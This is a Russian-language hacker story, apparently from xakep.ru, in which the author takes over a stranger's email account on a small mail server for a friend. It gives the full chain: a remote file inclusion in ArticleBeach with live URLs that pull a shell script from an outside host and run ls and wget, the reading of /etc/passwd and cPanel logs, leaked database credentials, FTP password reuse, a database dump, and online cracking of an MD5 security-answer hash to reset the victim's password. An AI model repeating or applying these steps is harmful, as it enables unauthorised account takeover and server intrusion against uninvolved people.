|
Так
повелось, что я никогда не брался за взлом мыл. Но тут поступило
заманчивое предложение
от одного знакомого, которому позарез нужен был доступ к
одному мылу.
Само мыло располагалось на небольшом почтовике *.co.uk.
Знакомый пробовал брутить мыло, но результата это не принесло
и он обратился к мне.
Сперва я простмотрел сам почтовик. Кроме окошка ввода логина/пароля
все сплошной html.
Попробовал форму ввода пароля на Sql-инъекцию, но ковычки
фильтровались.
Server: Apache/1.3.34 (Unix) PHP/5.0.5 mod_auth_passthrough/1.8
mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635
mod_ssl/2.8.25 OpenSSL/0.9.7a
Окрытые порты с сервисами тоже не радовали. Решил
проверить, не хостится ли тут еще кто-то. Оказалось по данному
ip числится еще несколько десятков сайтов.
Прошелся по ним, единственный phpBB оказался патченным,
поэтому ни один из эксплойтов не сработал.
И тут я наткнулся на продукт ArticleBeach www.articlebeach.com.
Первый же запрос:
http://www.***.com/index.php?page=http://durito.narod.ru/sh&cmd=ls%20-lpa
выдал мне список файлов сервера. Зря програмисты ArticleBeach
ели свой хлеб с маслом.
полазив по сайту я нашел еще одни баг, добродушно оставленный
разработчиками ArticleBeach,
в директории /includes/ любой юзер может просмотреть файл
config.inc следующего содержания:
Пример файла взят с сайта девелоперов ArticleBeach http://www.articlebeach.com/includes/config.inc
<?
global $_cn;
global $dbserver;
global $db;
global $dbuser;
global $dbpass;
//mysql database server,login,password & Database name
$dbserver ="localhost";
$database_connect="article_art";
$dbuser ="article_jer";
$dbpass ="aaaaa";
$connect = mysql_connect($dbserver, $dbuser, $dbpass)
or die("Couldn't connect to MySQL");
mysql_select_db($database_connect, $connect);
?>
Как вы уже поняли это реквизиты доступа к базе данных сервера.
К сожаленю в моем случае пароль на базу данных не подошел
к фтп,
чего нескажешь о других сайтах, где стоит продукт от ArticleBeach.
Пришлось ковырять сервер через внешнюю инклуду.
Открыв /etc/passwd я не смог обнаружить имя нужного мне
почтовика,
логины юзеров и доменные имена сайтов несовпадали.
Зато была возможность просматривать web-директории пользователей:
/home/*/public_html/
Уже хотел было начать тупо перебирать всех по списку, но
решил проверить файл accounting.log,
в котором хранятся логины и доменные имена на cpanel. И
точно я получил список доменных имен.
Выбрал нужный и стал изучать веб-директорию. Быстро нашел
в исходниках реквизиты доступа к БД MySQL:
'database' => '***_themail', // Name of your MySQL database
'username' => '***_postman', // The username and password
that
'password' => 'jkretj3h45j'
Пароль опять не подошел к фтп. Осталось
только прицепится к БД. Надо было искать доступную на запись
директорию или файл.
И опять спасибо разработчикам ArticleBeach которые позаботились
в своем продукте о директории /backup/ с правами drwxrwxrwx.
http://www.***.com/index.php?page=http://durito.narod.ru/sh&cmd=wget
-O backup/sql.php http://durito.narod.ru/sql.php
и фиг, то же самое с GET, links, fetch, lynx. Позже я узнал,
что запуск wget и GET запрещался PHP Secure, links, fetch
и lynx отсутсвовали.
Продолжил внутренний осмотр сайтов хостера. Навыуживал еще
несколько паролей к БД, но к фтп они опять не подошли, все
пароли представляли собой многосимвольную абракадабру.
И вдруг тайваньский сайт, интуиция подсказала проверить
его и вот оно - пароль доступа к БД - anahol !!! Конект
к фтп, пасс проходит и скрипт для работы с БД от rst.void.ru
залит. 
Конект
к базе, нахожу нужную таблицу и дамплю ее. А вот и заветное
мыло, пароль правда зашифрован MD5,
но это дело поправимое, правда долгое и муторное. Но для
начала я решил проверить хеш на http://md5.rednoize.com/,
но пасс
не был найден, и я уже приготовился было к долгому перебору,
но тут заметил, что и ответ на секретный вопрос тоже закодирован
в MD5. 
Пробиваю на md5.rednoize.com секретный вопрос и вот он:
Cheung !!!
Захожу не почтовик и отвечаю на секретный вопрос. Мне предлагают
ввести новый пароль и его подтвердить. Шах и мат!
И мой приятель получает доступ к заветному мылу, незабыв
мне выкатить пива. А я удаляюсь его жадно поглощать.
опубликована
на www.xakep.ru Твой
bug Durito.
_________________
EAT THE RICH! |
